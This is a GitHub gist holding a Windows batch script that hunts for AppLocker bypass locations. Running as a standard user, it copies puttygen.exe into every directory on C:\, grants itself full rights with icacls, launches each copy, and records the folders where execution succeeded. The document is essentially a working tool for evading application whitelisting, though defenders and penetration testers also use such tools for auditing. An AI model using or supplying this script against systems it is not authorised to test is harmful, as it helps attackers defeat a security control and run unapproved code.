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Forked from egre55/applocker_bypass_checker.bat
Created December 21, 2022 00:35
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applocker bypass checker
@echo off
REM Influenced by the Powershell-based AppLocker Bypass Checker (created by Tom Aafloen), which attempts to find folder that are both writable
REM and executable under C:\Windows (whitelisted by AppLocker default rules).
REM However, environments implementing application whitelisting may also block powershell.exe.
REM This intends to be a non-PowerShell method of finding AppLocker bypasses under the entire C:\. Replace puttygen.exe as appropriate. Run as a
REM standard (non-admin) user ;D. Bypasses listed in bypasses.txt
cd C:\TEMP\
echo Creating list of all directories and sub-directories
dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt
echo Attempting to copy puttygen.exe to all folders
for /F "tokens=*" %%A in (dirs.txt) do copy "C:\Temp\puttygen.exe" "%%A" /Y
echo Attempting to execute puttygen.exe (find whitelisted locations)
for /F "tokens=*" %%A in (dirs.txt) do if exist "%%A\puttygen.exe" icacls "%%A\puttygen.exe" /grant %USERNAME%:f & start "" "%%A\puttygen.exe" && tasklist /v | findstr "puttygen.exe" > executed.txt && for %%B in (executed.txt) do if not %%~zB==0 echo %%A >> bypasses.txt && taskkill /IM puttygen.exe /F && del /F executed.txt
echo Deleting puttygen.exe from all locations
for /F "tokens=*" %%A in (dirs.txt) do del /F "%%A\puttygen.exe"
echo Done
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